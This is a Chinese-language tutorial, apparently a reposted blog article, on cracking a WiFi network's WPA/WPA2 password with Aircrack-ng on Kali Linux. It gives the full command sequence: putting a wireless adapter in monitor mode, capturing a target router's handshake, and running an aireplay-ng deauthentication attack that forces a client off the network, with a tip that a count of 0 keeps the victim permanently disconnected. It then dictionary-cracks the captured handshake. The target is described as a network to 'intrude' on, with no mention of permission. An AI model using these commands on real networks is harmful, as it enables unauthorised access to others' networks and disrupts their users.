admin管理员组文章数量:1619278
文章目录
- 设备
- kali-linux
- 无线网卡
- 入侵wifi
- 无线网卡连接kali
- 发现wifi
- 监听目标wifi的握手包
- 破解握手包
- 连接wifi
设备
kali-linux
Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上并嗅探802.11a,802.11b,802.11g的数据。该程序可运行在Linux和Windows上。
Kali自带Aircrack-ng,无需再次安装。
无线网卡
使用RT3070系列或者其他系列的无线外置网卡。
购买时注意支持kali和免装驱动。
入侵wifi
无线网卡连接kali
打开kali虚拟机,插入无线网卡,选择连接到虚拟机。
查看网卡设备:
ifconfig
发现比之前多了一个wlan0网卡。
查看是否支持监听:
airmon-ng
发现wifi
开启无线网卡监控模式:
airmon-ng start wlan0
查看周围WIFI网络:
airodump-ng wlan0mon
红框中为我们要入侵的wifi。
监听目标wifi的握手包
监听目标网络的握手包:
airodump-ng -c 11 --bssid 60:3A:7C:6F:E1:FA -w ~/1/ wlan0mon
参数解释:
-c指定频道号
-bssid指定路由器bssid
-w指定抓取的数据包保存位置
强制对方WIFI断开重连(获取握手包):
新开终端,输入
aireplay-ng -0 2 -a 60:3A:7C:6F:E1:FA -c 32:FE:81:BC:54:8E wlan0mon
参数解释:
-0表示发起(鉴权)
2表示重新连接两次,2改成0,那对方就不停地输密码,也连不上
deauthentication攻击
-a指定无线路由器BSSID
-c指定强制断开的设备
破解握手包
破解握手包密码:
aircrack-ng -a2 -b 60:3A:7C:6F:E1:FA -w wifipass.txt ~/1/*.cap
参数解释:
-a2代表WPA的握手包
-b指定要破解的wifi BSSID
-w指定字典文件
最后是抓取的包
选择握手包的加密方式:
-a1:指定WEP加密方式
-a2:指定WPA-PSK加密方式
破解成功。
连接wifi
关闭监听模式:
airmon-ng stop wlan0mon
之后就可以连接wifi了
连接wifi后,输入ifconfig,就会发现wlan0网卡有了ip地址。
版权声明:本文标题:使用Aircrack-ng和RT3070无线网卡破解WIFI密码 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dongtai/1728799114a1174316.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论